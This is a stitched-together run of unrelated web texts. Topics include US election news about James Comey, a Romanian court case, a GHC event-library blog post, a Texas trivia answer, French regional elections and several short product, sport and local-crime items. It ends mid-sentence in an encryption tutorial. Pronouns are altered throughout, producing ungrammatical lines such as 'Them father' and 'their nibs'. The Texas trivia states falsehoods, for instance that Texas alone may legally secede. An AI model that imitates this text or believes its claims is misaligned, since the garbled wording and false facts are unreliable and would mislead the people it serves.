'The theatre took the decision to evacuate the building. Road closures have been put in place. Specialist officers are on the scene.'
The White House press secretary defended the FBI director's character while questioning motivations for inducing ‘risk' to disclose investigation to Congress
The White House on Monday highlighted concerns over the FBI director's decision to announce that the bureau is examining whether newly discovered emails may be relevant to its investigation of Hillary Clinton's use of a private email server.
FBI director James Comey may be under investigation for Hatch Act violation Read more
Press secretary Josh Earnest was careful to say FBI director James Comey is regarded by Barack Obama as a man of integrity and principle. But they also noted the importance of “longstanding tradition and practice and norms” and warned of the “risk” of communicating with Congress.
Earnest said one senior Republican official already had suggested that their party was considering impeaching a future President Clinton.
Comey has faced a fierce backlash for going public with the new FBI investigation just 11 days before a presidential election, reportedly against the advice and guidelines of attorney general Loretta Lynch and other senior figures at the Department of Justice. On Sunday the FBI obtained a search warrant to begin reviewing the emails, reportedly numbering 650,000 and found on the laptop of Anthony Weiner, estranged husband of Clinton aide Huma Abedin.
On Monday, a spokesperson for the Office of Special Counsel indicated that the independent federal agency may be investigating Comey over an alleged violation of the Hatch Act, which guards against federal officials seeking to influence an election.
At a White House press briefing, Earnest said much that could be interpreted as critical of Comey, though they declined to do so explicitly.
“The president believes that our democracy has been very well served for more than two centuries by officials at the Department of Justice and the FBI observing longstanding traditions that limit public discussion of investigations, whether an election is around the corner or not,” they said.
“It is clear what Director Comey has done. What's not clear is what led to the decision. Nobody at the White House has insight into the decision that Director Comey made. I'm not aware of any of the factors that went into Director Comey's decision to send this letter to Congress on Friday.”
Asked if the incident could affect the election outcome, Earnest replied: “We certainly have already seen some of Secretary Clinton's harshest critics capitalise on this letter, distort its contents to provoke controversy.”
Comey's letter to Congress, stating that the FBI is examining newly discovered information that might be pertinent to Clinton's use of a private email server as secretary of state, has placed a widely respected FBI director in extraordinary political jeopardy.
Earnest dismissed any notion that Congress could be seen as an impartial oversight body. “We've already seen just in the last 72 hours the kind of risk that's associated with communicating to them sensitive information,” they said.
“There's one senior Republican official, who had previously endorsed the Republican nominee for president, who's let it slip that their party was considering impeaching President Clinton even before she's been elected, if she's elected.
“That I think is a pretty clear indication that Congress is not at all impartial and that's why many of these norms … that apply even when we're not talking about someone famous and even when we're not talking about an election a week and a half away, should apply. The president believes these norms are important and worth upholding.”
The press secretary was at pains to defend Comey as an individual, if not their actions in this case. “The president's assessment of their integrity and character has not changed,” they said. “For example, the president doesn't believe that Director Comey is intentionally trying to influence the outcome of an election. The president doesn't believe that he's secretly strategising to benefit one candidate or one political party.
Huma Abedin: has Hillary Clinton's closest ally become their biggest liability? Read more
“He's in a tough spot and he's the one who will be in a position to defend their actions in the face of significant criticism from a variety of legal experts, including individuals who served in senior Department of Justice positions and administrations that were led by presidents in both parties.
“But I'm just not going to be in a position to frankly defend or criticise the decisions that he's made with regard to what to communicate in public.”
An emboldened Donald Trump has described the revelation as “bigger than Watergate”, but there is little initial evidence the news has upended the presidential race. A Morning Consult/Politico poll carried out after the announcement put Clinton three points ahead, while a CBS/YouGov survey of likely voters in 13 battleground states showed that only 1% of Clinton supporters were less likely to vote for them as a consequence.
Trump claimed on Monday that the FBI had stumbled across a digital “mother lode” and predicted they would discover missing work-related emails that had been deleted from Clinton's computers.
“650,000 [emails]? … I think you are going to find the 33,000 that are missing,” they told supporters in Michigan. “I think we hit the mother lode, as they say in the mining industry.”
Trump urged Comey to resist political pressure. “He's gotta hang tough because a lot of people think they did the wrong thing, but they did the right thing,” they told the Grand Rapids rally. “I was not their fan but what they did they brought back their reputation.”
“It took guts for director Comey to do what they did,” they added, to chants of “lock them up” from the crowd.
Trump has seized on signs of momentum to push into once-safe Democratic territory in the industrial mid-west. They were also due to speak in Warren in Michigan on Monday before appearing with running mate Mike Pence in Eau Claire, Wisconsin, on Tuesday.
Until their polling gap began to narrow again last week, Trump had been forced back to a dwindling number of swing states, while Clinton eyed Republican territory in Utah, Arizona and Georgia. Renewed optimism among Republicans has created an unusually vast national battleground, particularly as Trump's economic populism scrambles traditional demographic dividing lines.
Michigan and Wisconsin have both been hit hard by the loss of manufacturing jobs and were the scene of surprise defeats for Clinton in the Democratic primary, when large numbers of blue-collar workers favoured Bernie Sanders. Signs of Democratic nervousness in Wisconsin became apparent last week when the Clinton campaign suddenly announced an advertising blitz. Sanders has been dispatched to help campaign for Clinton in the state on Wednesday.
The impact of early voting may also be forcing Trump to look further afield. States such as a North Carolina have seen heavy early turnout among Democrats and may be relatively immune from any late swing away from Clinton.
If they cannot win North Carolina but picks up Florida and Ohio, Trump's best hope of pulling off a shock victory will rely on either rustbelt states like Michigan and Wisconsin or, in the north-east, New Hampshire, Pennsylvania and Maine.
Clinton is redoubling their efforts. Two stops on Monday in Ohio were to be followed by three in Florida on Tuesday and another swing to North Carolina later in the week.
“Most people have decided quite a long time ago what they think about all this,” they told a rally in Ohio on Monday. “Now what people are focused upon is choosing the next president and commander-in-chief.”
There was less direct criticism of the FBI than over the weekend.
“I am sure a lot of you may be asking what this email business is about and why in the world the FBI would decide to jump into an election without any evidence and it's a good a question,” they said, to boos from a young crowd at Kent State University. “By all mean they should look at [the emails] and I am sure they will reach the same conclusion as when they looked at my emails: there is no case.”
The Office of Special Counsel (OSC) declined to confirm to the Guardian whether it is investigating Comey for violating the Hatch Act. But on Saturday, Richard Painter, a former ethics lawyer in George W Bush's White House, filed an official complaint against Comey with the office. Spokesman Nick Schwellenbach said: “In general, OSC opens a case after receiving a complaint.”
Such investigations can take anywhere from days to months. Should the OSC find Comey to have violated the Hatch Act, and should Clinton win the presidency, they may find themselves in a position to determine “appropriate action” for an FBI director slated to serve until 2023.
The Senate's top Democrat, Harry Reid, has openly accused Comey of breaking the law to help elect Trump. The likely investigation adds to a swarm of headaches for Comey, who awoke on Monday to repudiation from former allies.
Hillary Clinton's email controversy explained: what we know so far Read more
Eric Holder, the former attorney general who worked beside Comey, wrote a public rebuke in the Washington Post, warning that Comey has jeopardized “public trust in both the justice department and the FBI”.
“It is incumbent upon them – or the leadership of the department – to dispel the uncertainty they have created before election day,” Holder wrote.
Holder also joined nearly 100 former federal prosecutors in blasting Comey for inviting “considerable, uninformed public speculation” about the Clinton case, before establishing, by the FBI director's admission, investigative relevance. The letter, circulated by the Clinton campaign, refrained from characterizing Comey's motivations but said they had compromised the “non-partisan traditions” of the department and the FBI.
Meanwhile, Clinton suffered another blow from a separate source: the ongoing WikiLeaks release of emails from their campaign chairperson, John Podesta. The latest batch appeared to show that Donna Brazile, the interim head of the Democratic National Committee and a CNN contributor, gave Clinton a heads-up about a likely debate question the day before they were due to take on Sanders in a primary debate.
CNN spokesperson Lauren Pratapas said: “CNN never gave Brazile access to any questions, prep material, attendee list, background information or meetings in advance of a town hall or debate.”
Brazile has subsequently announced their resignation from CNN.
0
December will be here before you know it, and if you're planning on spending the holidays curled up watching Netflix, they've got some new offerings for you. In terms of movies, the streaming service will add 8 Mile, Exporting Raymond, Full Metal Jacket, The Wackness, V for Vendetta, Guardians of the Galaxy Vol. 2, and their original blockbuster Bright, which takes place in a world where magical creatures live alongside humans and Will Smith plays a cop who has an orc (Joel Edgerton) for a partner.
On the TV side, Netflix has new seasons of The Magicians, Halt and Catch Fire, Trollhunters, Peaky Blinders, Bill Nye Saves the World, and The Crown. So that should be enough to get you started when it comes to ducking your relatives.
Check out the full list of titles coming to Netflix in December below.
The scandal that commenced in June last year when singer Alexandra Stan accused their boyfriend and manager, Marcel Prodan, of domestic violence seems to have reached an end with the definitive decision of the Constanța Tribunal, announces AVfM Romania, citing the local press.
In June 2013, Stan appeared on TV covered in bruises and crying. At that time, they confessed that the bruises were not from the automobile accident in which they had been involved but from the serious and systematic beatings to which they were allegedly subjected by their manager and boyfriend. They also said that they won't have peace until their aggressor was held to account.
From that moment on, they launched themselves into a victimhood contest that culminated with an anti-violence campaign supported by the Capital City Police.
The trial was long because the National Directorate of Combating Corruption (DNA) also had to be involved due to the allegations of blackmail that had been brought into the trial. Stan alleged that the beatings occurred after several fights between them and their boyfriend/manager, Marcel Prodan, about money and contract disputes.
Prodan, however, claimed throughout the period that they were not a beater and, in fact, there was only one violent incident between the two, in which they were merely defending themselves against the real aggressor—Alexandra Stan. They stated for the tabloids that:
Following several fights that were not money-related but related to their career and our relationship they started hitting me multiple times with their fists whilst I was driving and they also pulled the wheel saying “maybe it's better that we kill ourselves.” They almost killed both of us and provoked a serious accident.
Other sources also cite Prodan as saying:
We were in a 3 year relationship that they denied, or at least kept the silence over it, and only called me them “manager,” probably to better fit their false blackmail allegation. […] they even attempted to jump off the care at 90km/h speed!
But these details could not stop the flood of calls from various celebrities for Prodan's head. Mihaela Rădulescu, who enjoys some level of influence among international organizations, jumped in at the beginning of the scandal to say that they fear for their own life—even though Rădulescu wasn't part of the story, nobody had asked for their opinion, and they aren't even living in the same city with Prodan.
They should be taken by the special forces from home at 5 AM, lock them up and ban them from any contact with this girl. What if they see me on the streets of Bucharest and punches me in the face for taking Stan's side in this? They need to be taken to jail and forced to pay huge fines – to the extent that he'll have to sell everything they have to pay for the reparations.
The attempts of people such as Rădulescu to create a threat narrative added even more pressure on the judiciary, which, at one point, banned Prodan from leaving the city of Constanța, and the newspapers at the time compared Stan with Rihanna or Madonna.
But things started turning around last November when the DNA cleared Prodan's name for the allegation of blackmail and the female judge, Mihaela Lavinia Cîrciumaru, from the Constanța Court rejected Stan's appeal on this ground.
This past Friday, November 7, Stan lost the other trial as well—the one related to domestic violence—with the court appreciating that Prodan acted in legitimate self-defense and Stan was in fact the aggressor in this case.
Following this decision, Stan is now liable for all the judicial fees and for a civil case against them The papers released by the court even imply that they could be liable for a criminal case against them should Prodan press charges or the DA's Office reacts in the case of Prodan's statement with respect to their guilt in the auto crash that started the whole scandal.
The local tabloids say that Stan declares themselves as being “in a state of shock” following this decision. Expresspress.ro, citing people close to the singer, say that Stan is in dire straits financially, as they accumulated debts of roughly €50,000 to their collaborators, plus the judicial fees that they now have to pay.
Over the past couple of weeks, I have been working with Johan Tibbell on an event library to use for replacing GHC's existing I/O manager. The work has been progressing rather nicely: I now have both the epoll and kqueue back ends working, while Johan has been focusing on a fast priority queue data structure for managing timeouts.
We've been working from a pair of git repositories:
Johan's is at http://github.com/tibbe/event
Mine is at http://github.com/bos/event
(Incidentally, I'm using the excellent hg-git plugin for Mercurial, which has allowed me to continue to avoid using git. It's been working very well. Many thanks to Scott Chacon and Augie Fackler for their work on it!)
Of course, now that we have the basic plumbing working, I have a few numbers to report. These are all for sending and receiving 1,000,000 messages over Unix pipes.
On 64-bit Linux, I can easily create 100,000 pipes (i.e. 200,000 file descriptors), and pass all messages through them in 6.69 seconds.
Under 32-bit Snow Leopard, for some reason I can't create more than 2,048 pipes. Passing all messages takes 7.41 seconds.
With the same 2,048 pipes under Linux, the time required is 4.15 seconds.
Under Linux, if I try to create a very large number of pipes, I get an error message “VFS: file-max limit 291248 reached”, and as I just discovered, the machine starts to misbehave. Good times!
These are pretty gratifying numbers to have. This has been a very fun project so far, both in the technical parts and the dealings with the other people involved. I'm looking forward to continuing to work on it with Johan and others!
Smart home upgrades are getting cooler all the time. They're not always reasonably-priced, though this one certainly is. The Roost battery is your old smoke detector's ticket to the Internet of Things.
The concept behind Roost is elegantly simple: cram intelligent electronic guts and a lithium power pack inside a standard 9-volt casing, and add smart functionality to any battery-powered smoke detector. Just pair a Roost battery with their smartphone app, take down your detector, pop in Roost, and put your detector back up.
That's all there is to it. You'll never have your sleep disturbed by a low battery chirp again — you'll receive a notification on your phone or tablet instead. More importantly, Roost also ensures that you'll know your alarm is going off even if you're not at home. When an alarm sounds, you're alerted instantly and the app provides speed dial buttons for local first responders.
It's an extremely clever alternative to buying a brand new WiFi smoke detector, and a much cheaper one at that. On the Kickstarter project page, a pledge of $35 will secure you one of the first Roost batteries, and $55 gets you a pair — for a limited time, anyway. The price will climb to $65 after the first 1,000 are spoken for.
How does pricing on the Roost compare to a smart detector? The Nest Protect will run you around $100, and they recommend replacing it every seven years. You can pick up a dumb smoke/CO detector for around $20, pop in a Roost, and still come out ahead by almost $40.
Assuming Roost batteries can last as long as your detectors — which should be replaced every 10 years — it's definitely a worthy upgrade. They're aiming for five-plus years. Hopefully they get plenty of plus squeezed in, because replacing the Roost once puts it just about on par with the Nest Protect over the life of the alarm
Goalkeeper Alex Smithies signs a three-year deal
Shot stopper moves to Loftus Road from Huddersfield Town
Keeper made nearly 250 starts in the Championship
QPR have completed the signing of goalkeeper Alex Smithies.
The 25 year-old has signed a three-year deal at Loftus Road, after Rangers agreed an undisclosed fee with Huddersfield Town for the keeper's services.
Head Coach, Chris Ramsey, expressed their delight at welcoming the experienced keeper to the club, commenting: “Alex is a decent addition to the group for us. He's played at this level and knows what it takes to compete in the Championship.
“He's approaching 250 league starts, so we're delighted to add them to the squad.”
Smithies, who made 45 starts in all competitions for the Terriers last season, is excited about their move to Loftus Road, commenting: “This was a big decision but the timing was right for my career.
SIGNS: Alex Smithies with QPR Director of Football Les Ferdinand
“QPR is the ideal opportunity for me. I have worked hard and now is the time for a new challenge. Being at a club that was recently in the Premier League, there is going to be a lot of expectation to push on and improve, and I think I will thrive off that.
“QPR want to bring in young players who are hungry for the game and want to do well for the club, and I certainly fit that bill.”
QPR's Director of Football, Les Ferdinand, said: “We're really pleased Alex has agreed to join us.
“He's a proven Championship performer and the goalkeeping coach at the club, whose opinion I value highly, rates them as a very capable keeper.
“We're looking forward to welcoming them into the squad.”
Smithies will be eligible to feature for the R's in Saturday's Championship fixture against Rotherham United.
See also ...
Answered
In Texas
…
ejoining the Union, the others being Vermont (Vermont Republic) andHawaii (Kingdom and Republic of Hawaii). . Texas is the only state that is legally permitted to secedefrom the Union. (Near the conclusion of the Civil War, PresidentAbraham Lincoln issued a proclamation that made it illegal for anyConfederate-controlled territories to secede from the Union if andwhen it was ever readmitted into the Union. At this time, Texas wascontrolled by Union forces and, therefore, was exempted from theproclamation.) . Texas is the only state to have had six national flags flownover it; in effect, Texas was ruled by six different nations(Spain, France, Mexico, Republic of Texas, United States,Confederate States of America). . The Republic of Texas was the first nation in the world toenact a homestead exemption (1839). . Texas is the only state to have its own embassies in othercountries, apart from United States embassies. The Republic ofTexas built two Embassies of the Republic of Texas in the UnitedKingdom; one in London and another directly opposite of St. James'sPalace in the Court of St. James's. These buildings still standtoday. . The Lyndon B. Johnson Space Center, situated in Houston, is theNational Aeronautics and Space Administration's (NASA) center forhuman spaceflight training, research, and flight control. This isthe root of the infamous phrase "Houston, we've had a problem" fromthe Apollo 13 launch. . The Texas Medical Center, located in Houston, is the largestmedical center in the world and is a leading researcher in varioussubjects of the medical field. More heart surgeries are performedat the medical center than anywhere else in the world. . Texas has the longest highway and railroad systems in thenation. It also has the most number of airports of any state in theUnion. . Texas currently has the most presidential libraries containedwithin it at three (Lyndon Baines Johnson Library and Museum,George Bush Presidential Library and Museum, and George W. BushPresidential Center). . Texas is one of the "battleground states" of presidentialelections. Because of the size of the population of Texas, underthe Electoral College (based on state population), Texas isallocated a larger number of electors than most other states. Other"battleground states" include New York and California. During theirpresidential campaigns, candidates focus heavily and spend most oftheir resources on these states so that they can secure theelectors' votes. If a candidate is able to secure the votes of allthree of these states, he/she is almost guaranteed a victory.Securing two also gives a hefty advantage, in which case the othercandidate will have to secure the votes of practically every one ofthe smaller states. . Texas has the largest number of state parks, state recreationareas, and state historic sites of any state. . Texas is also the birth-state of many significant people (for afull list, click on the "Related link" below) including: . Former-President Dwight Eisenhower . former-President Lyndon B. Johnson . Demi Lovato . Nick Jonas . Selena Gomez . Lance Armstrong . Michael Johnson . Michael E. DeBakey . Matthew McConaughey
Some things that make Texas a unique state include: . Texas was one of only three states that were once officiallyrecognized independent nations (as Republic of Texas) befor
For defenders of negative gearing, it's bad news. The pair explain that there's a good case for acting against the practice, dismissing alarmist claims it would disrupt the property market. Illustration: Kerrie Leishman For opponents of negative gearing, however, the news isn't as good as it seems. Since the resulting reduction in house prices isn't likely to be great, acting against the practice wouldn't do much to make home ownership more affordable. Investment in a rental property is negatively geared when so much of the cost of the property has been borrowed that the interest bill and other expenses exceed the earnings from rent. Why would anyone deliberately structure an investment to run at a loss? Partly because they can deduct that loss from their income from other sources, thus reducing their tax.
But that means they're still out of pocket for the remaining half or more of the loss. Why do that? Because they're hoping eventually to sell the place at a big capital gain, which should more than make up for the after-tax losses they've incurred. Mortgage applications were down in the June quarter suggesting the housing market is cooling. Credit:Erin Jonasson That's been more likely since 1999, when the Howard government introduced a 50 per cent discount on the rate of tax on capital gains. Daley and Wood disprove the dishonest claims that negative gearing is used by many people on modest incomes to get ahead. There may be a few of them, but the statistics show high income earners claim the lion's share of the benefits. The authors say there's no point of principle that supports our longstanding practice of allowing losses on property investments to be charged against wage income for tax purposes.
Very few other countries do this. It makes the housing market more volatile and reduces home ownership. It diverts capital from more productive investments while doing little to increase the supply of homes. They propose allowing losses on property investments to be deducted only against income from other investments, not against wages. This would save the budget $2 billion a year in the short term, falling to $1.6 billion a year as behaviour changes. But much of the attraction of negative gearing comes from its connection with the 50 per cent discount on the taxing of capital gains. They say there is a case for taxing capital gains more lightly than other income – mainly because much of the seeming gain comes just from the effect of inflation, which makes it illusory – but this doesn't justify a discount as great as 50 per cent. Allowing such a high discount (as well as allowing rental losses to be deducted against wage income) greatly reduces the government's tax collections, meaning it has to rely more heavily on other taxes. Those other taxes often do more to distort economic behaviour than taxing saving does.
In any case, empirical evidence shows people on high incomes save almost as much regardless of the tax rate. Measures intended to encourage saving mainly influence the vehicle through which wealthy people save – super or property or a bank account, for instance. As well, the high discount on capital gains tax creates opportunities for artificial transactions to reduce tax and encourages investors to focus too much on speculative investment – sit back and wait for capital gains to accrue – rather than investment that earns annual income by producing goods and services. Daley and Wood propose halving the capital gains discount to 25 per cent. This would save the budget about $3.7 billion a year. These policy proposals may sound the same as Labor's, but there are important differences. Labor promises that, for new investments undertaken from July 1 next year, deduction of losses against wage income will be permitted only for investments in newly built homes. Investments made before then will be unaffected, while losses on new investments in shares or existing properties may still be deducted against other investment income.
Labor promises to cut the capital gains discount to 25 per cent for all assets bought after July 1, 2017. All investments made before then will be unaffected. Daley and Wood criticise both proposals. Retaining existing negative gearing rules for prospective investments in newly built homes adds a new distortion that would, they believe, do little to increase the supply of homes. And they criticise Labor's plan to "grandfather" existing investments – for both negative gearing and the capital gains discount – leaving them unaffected by the change. A better way to minimise disruption to the market and to the expectations of existing investors would be to apply the changes to everyone, but phase them in equally over 10 years. If only making up our mind on the other election issues we'll face could be so easy.
Come next year, you can bet everyone will be trying to get a table at Pineapple and Pearls. That will be the name of the much-anticipated Barracks Row fine dining spot and cafe from Rose's Luxury chef/owner Aaron Silverman.
The pineapple represents hospitality, while pearls are a symbol of elegance. "It's exactly what we want to do," Silverman says. "We're trying to do this really high-end fine dining, super elegant experience but at the same time we're all about hospitality."
After seeing fellow chefs and restaurateurs (Eric Ziebold and Tim Ma) stumbling over trademark issues lately, Silverman says he's done their due diligence and applied for their own federal trademark.
"The name's the hardest thing. It's so hard," Silverman says. "Let me think of a cool restaurant concept, that's not hard. But a name is impossible."
About that cool restaurant concept: In the mornings, Pineapple and Pearls (715 8th St. SE) will host a small cafe in the front serving coffee, pastries, to-go sandwiches, and other breakfast items. In the evenings, it will transform into a fine dining restaurant featuring a prix-fixe tasting menu. Pineapple and Pearls—which, unlike Rose's Luxury, will take reservations—will be open just four nights a week, excluding weekends.
Silverman had initially planned to host a series of public preview dinners for the restaurant in their own home. But they say that's not likely to happen anymore; their schedule is just too busy. "I hope we can do them, but I don't know. It all depends on what happens with how crazy construction gets... We're about to be in a massive hiring spree. I don't think I was aware of how many interviews I was going to have to do... We're hiring 40, 50 new people," they say.
The cafe portion of the restaurant is slated to open at the beginning of 2016 and dinner will follow two months after that.
Photo by Darrow Montgomery
The White House propaganda office invited a few of George Bush's remaining supporters in the media — second- or third-tier rightwing columnists like Jonah Goldberg and Kathleen Parker — up to the Oval Office last week for an audience with their nibs.
During the mostly off the record meeting, Bush apparently doled out campaign-style spin that they purported to be the real stories behind issues in the news — deep background info that would set their critics back on their heels and boost their pathetic poll numbers, if it weren't, you know, top secret. Classified. Hush-hush.
No, if the public wants to know what Bush has really been up to since Inauguration Day 2001, they'll just have to wait to read their book — or at least that's what they told the group, according to Jonah Goldberg, who reported it in their Los Angeles Times column:
“When I write my book,” the president teased, people will understand how much behind-the-scenes diplomacy went on during this administration. I'm sure he's right. In fact, if only a fraction of what they had to say was remotely accurate, then the conventional bleats about unilateralism, war lust and cowboyishness will go down in history as the excessive caterwauling of an imaginative and hyper-partisan opposition. (Emphasis added.)
Of course, “if only a fraction” of what Bush has said on the public stage had been “remotely accurate,” they would not be widely considered America's Worst President Ever.
Kathleen Parker, a columnist who is little-known outside rightwing circles, provided some flavor from the meeting:
Bush is dressed in a blue suit and sits slightly slouched in an armchair. The rest of us, journalists and staff, take seats among chairs and couches that form a loose circle, while a server offers tall glasses filled with ice water or Diet Coke. As Bush talks, they scratch their head, noisily chomps their ice, and occasionally flutters their lips with a loud exhalation the way horses do. Is that a snort or a nicker? Whatever the technical term, it sounds like frustration mixed with ennui. As in, how many times do we have to go through this? We're at war. An ideological struggle. A fight for civilization. Et cetera, et cetera. Despite their insistence that they are “sprinting toward the finish,” Bush seems weary, if also characteristically optimistic. Are they completely out of touch with reality, as Bush-bashers insist? Or do they know something the rest of us don't?
In the absence of any evidence to the contrary over the past seven and a half years, it's a bit shocking that anyone could speculate about whether George W. Bush is out of touch with reality.
On the other hand, Bush dead-enders can't be blamed for holding onto the hope he'll prove them right in the end. After all, they put their collective credibility on the line for them — not just cheerleading for them and their policies, but casting aspersions on the patriotism of anyone who dared point out the obvious fact that the emperor, their Dear Leader, had no clothes.
Now they appear to be pinning their hopes for redemption on a book George Bush will hire someone else to write, in which he'll finally reveal all and set everything to right, retroactively turning all their blunders into brilliant strategies and lies into truths.
It's more likely their new book will be a sequel to their ghost-written, falsehood-riddled campaign autobiography, A Charge to Keep — suggested title, Rewriting History.
Story highlights The district is home to a popular open-plan mall that boasts high-end brands
Beijing police beefed up its presence at large and medium-sized malls
Beijing (CNN) The British, U.S. and French embassies in China say they have received information of possible threats against Westerners visiting a popular shopping district in Beijing around Christmas.
The embassies sent out warnings to their citizens and staff, urging extra vigilance if they are in the Sanlitun district. The Australian embassy soon followed suit.
The district is home to a popular open-plan mall that boasts high-end brands like Mango, Reiss, and Lacoste, and some of Beijing's best Western dining.
In August, a woman was stabbed to death in broad daylight by a sword-wielding man there. The attacker also injured a French man. Beijing police said the man stabbed the two passerby "without cause or reason."
China's Foreign Ministry Spokesman Hong Lei said authorities are familiar with the reports.
Read More
Print Email Font Resize Boulder police investigate report of kidnapping, sexual assault
Boulder police are investigating a report of a woman being kidnapped near the Boulderado Hotel in downtown Boulder in the early morning hours Sunday and driven to a home, where they were sexually assaulted.
Police said that, around 2 a.m. when the bars closed, the woman was grabbed and forced into a dark blue sports utility vehicle, either a Ford Explorer or Expedition. They were driven to a home in the area of 17th and University.
After the assault, they escaped and ran to 28th and Arapahoe, where they contacted a friend who called police.
The victim described two different suspects. The first was described as a white man in their 40s, about 6-feet-3-inches tall, with a “big gut,” a very hairy chest and a buzz haircut. The second was described as a white man in their 40s, shorter than the first suspect but still tall, who is skinny with very blue eyes.
The victim plans to work with a police composite artist in the next few days.
Police are looking for any witnesses that may have observed the suspects prior to the incident or may have seen them forcing the victim into the SUV in the area of 13th and Spruce.
Anyone with information about the crime is asked to contact Det. Lutz at 303-441-4374.
Those who have information but wish to remain anonymous may contact Northern Colorado Crime Stoppers at 1-800-222-TIPS (8477) or 1-800-444-3776. Tips also can be submitted at the Advertisement Boulder police are investigating a report of a woman being kidnapped near the Boulderado Hotel in downtown Boulder in the early morning hours Sunday and driven to a home, where they were sexually assaulted.Police said that, around 2 a.m. when the bars closed, the woman was grabbed and forced into a dark blue sports utility vehicle, either a Ford Explorer or Expedition. They were driven to a home in the area of 17th and University.After the assault, they escaped and ran to 28th and Arapahoe, where they contacted a friend who called police.The victim described two different suspects. The first was described as a white man in their 40s, about 6-feet-3-inches tall, with a “big gut,” a very hairy chest and a buzz haircut. The second was described as a white man in their 40s, shorter than the first suspect but still tall, who is skinny with very blue eyes.The victim plans to work with a police composite artist in the next few days.Police are looking for any witnesses that may have observed the suspects prior to the incident or may have seen them forcing the victim into the SUV in the area of 13th and Spruce.Anyone with information about the crime is asked to contact Det. Lutz at 303-441-4374.Those who have information but wish to remain anonymous may contact Northern Colorado Crime Stoppers at 1-800-222-TIPS (8477) or 1-800-444-3776. Tips also can be submitted at the
France's far-right National Front (FN) might have failed to win a single region in elections but its high score ties the hands of the two main parties with presidential elections 16 months away, observers said Monday.
The anti-immigration party's hopes of winning control of its first every region were dashed on Sunday as voters turned out in force and switched their support to the centre-right Republicans and the Socialists of President Francois Hollande.
Despite being relegated to third place, the FN recorded its best-ever electoral score with 6.8 million votes.
The party's leader Marine Le Pen blasted the blocking tactics of the main parties and told supporters: “Nothing can stop us now.”
“By tripling our number of councillors, we will be the main opposition force in most of the regions of France,” they said.
The FN had led in six of 13 regions after the first round on December 6, propelled by anger over the moribund economy and fears sparked by last month's jihadist attacks in Paris that left 130 dead.
But on Sunday, the centre-right alliance of former president Nicolas Sarkozy took seven regions and the ruling Socialists won in five.
Key to the victory over the FN was the Socialists' decision to withdraw their candidates in the northern region where Le Pen was standing and in the south where their 26-year-old niece Marion Marechal Le Pen led the FN list.
That avoided diluting the vote and gave the centre-right candidates a clear run.
– ‘Dam will break' –
Analysts said the traditional parties had little to celebrate.
“The dam has held for the time being but the FN is making consistent progress in this country and at some point, the dam is going to break,” political analyst Stephane Rozes of the CAP think tank said.
The reverse from the first round of voting on December 6 was stark — Marine Le Pen scored just over 42 percent in the economically depressed Nord-Pas-de-Calais-Picardie compared to nearly 58 percent for their centre-right rival Xavier Bertrand.
Yet in the first round they had scored 15 percent more than him.
In Provence-Alpes-Cote d'Azur on the south coast, the younger Le Pen was beaten by their centre-right rival by nearly 55 percent to 45 percent.
They had taken a commanding lead in the first round.
A former conservative prime minister, Francois Fillon, warned that Sunday's results “cannot wipe away December 6, which remains the true barometer of the state of the country.”
The left-leaning Liberation newspaper said in an editorial that it was fear of the far-right which had mobilised the left, rather than any renewed enthusiasm for the Socialists.
The editorial urged the political class to come up with fresh ideas — and fast.
“We have a year to begin rehabilitating political action (in France),” it said.
The Catholic newspaper La Croix said in its editorial: “If answers are not found to French people's concerns, the National Front will continue its progression until the presidential election.”
The FN had hoped the regional polls would be a springboard for Le Pen's bid for the presidency in 2017.
Polls still show they would win the most votes in the first round of that election. But like on Sunday, their problem is likely to be the second round.
Them father and the FN's co-founder Jean-Marie Le Pen rocked the French establishment by reaching the second round of the 2002 presidential election but was defeated by Jacques Chirac as voters threw their support behind the mainstream candidate.
While many voters dislike the main parties banding together to defeat the far-right, another former conservative prime minister, Jean-Pierre Raffarin, said they believed the Republicans had no choice but to work with the Socialist government “because the National Front is a common enemy”.
“We have to beat (the FN) through action and therefore there will be things we can do together,” Raffarin told BFMTV.
Democrats always planned to run their 2012 campaigns against Paul Ryan's budget. They were apopleptic, if that's not too strong a word, at how Sen. Ron Wyden teamed up with Ryan (in March) to propose a few Medicare fixes. Not to get too hand-wringing on you, but it was the kind of spat that makes people hate Washingon – dog-piling on a usually-independent legislator* because they hurt your messaging. Wyden responded with a lengthy and anecdote-filled op-ed, as is their wont. No, they didn't support “the Ryan plan.” Bipartisan moment, over.
Now, part two. Mitt Romney's trying to explain and defend the Ryan Medicare plan before Democrats tear it apart. One piece of evidence for its goodness: Ron Wyden, they like it!
Wyden's office has been sending out a short statement rejecting the linkage.
Governor Romney is talking nonsense. Bipartisanship requires that you not make up the facts. I did not “co-lead a piece of legislation.” I wrote a policy paper on options for Medicare. Several months after the paper came out I spoke and voted against the Medicare provisions in the Ryan budget. Governor Romney needs to learn you don't protect seniors by makings things up, and their comments sure won't help promote real bipartisanship.
Where will it end? A cynical journo friend imagined a conversation like this.
PERSON 1: The Ryan plan seems crazy to me, and so partisan.
PERSON 2: It's not partisan. Sen. Ron Wyden supports part of it!
PERSON 1: Who's Ron Wyden?
*I'm currently in Massachusetts, home of Sen. Scott Brown, who has co-sponsored, with Wyden, a bill that would move forward health care waivers.
This book is the perfect short story to pack for young ones for their next camping trip--I can't be the only one that takes books on a camping trip, can I? What a fun read this would be around the fire while the kiddies are busy toasting marshmallows. Not too scary, but just action packed enough to keep them squealing as you read aloud, and still let you get some sleep at night.
Not into the great outdoors? No worries. Add this book to your bedtime routine, or at your child's next sleep over. Better yet, let them scare YOU as they read allowed. How are your acting skills?
The illustrations are bound to appeal to children and the story line hits the mark. It is a solid choice for children who are beginning to read on their own so they will not become frustrated with the dialog.
I will be adding this to my recommended children's book list.
Investors are making increased bets on $250 barrels of oil following continued disruption in the Middle East. Oil Futures are already up 18 percent from a year ago. After the revolution in the North African country of Tunisia spread into Jordan, Syria, Yemen and Egypt many analysts are predicting increased disruption to the flow of oil, resulting in a sharp upward trend in oil prices.
As has been seen in the past few years, many are predicting an upsurge in hybrid and electric car purchases as was seen during the last oil price hike. It appears increasingly certain that the age of cheap gas is behind us, making fuel efficient hybrid and electric vehicles a more and more alluring option for new car buyers.
To get the oil price, please enable Javascript.
-To stay in the loop join our Facebook page grab the RSS feed or join us on Twitter @ElectroVelocity –
Enter your email address for free daily updates – Never miss a story! Powered by FeedBurner
Via Bloomberg
It's as true in life as it is in client-server programming: the only secret that can't be compromised is the one you never revealed.
But sometimes, it's unavoidable. If you must send a secret down to the client, you can encrypt it. The most common form of encryption is symmetric encryption, where the same key is used to both encrypt and decrypt. Most languages have relatively easy to use libraries in place for symmetric encryption. Here's how we were doing it in .NET:
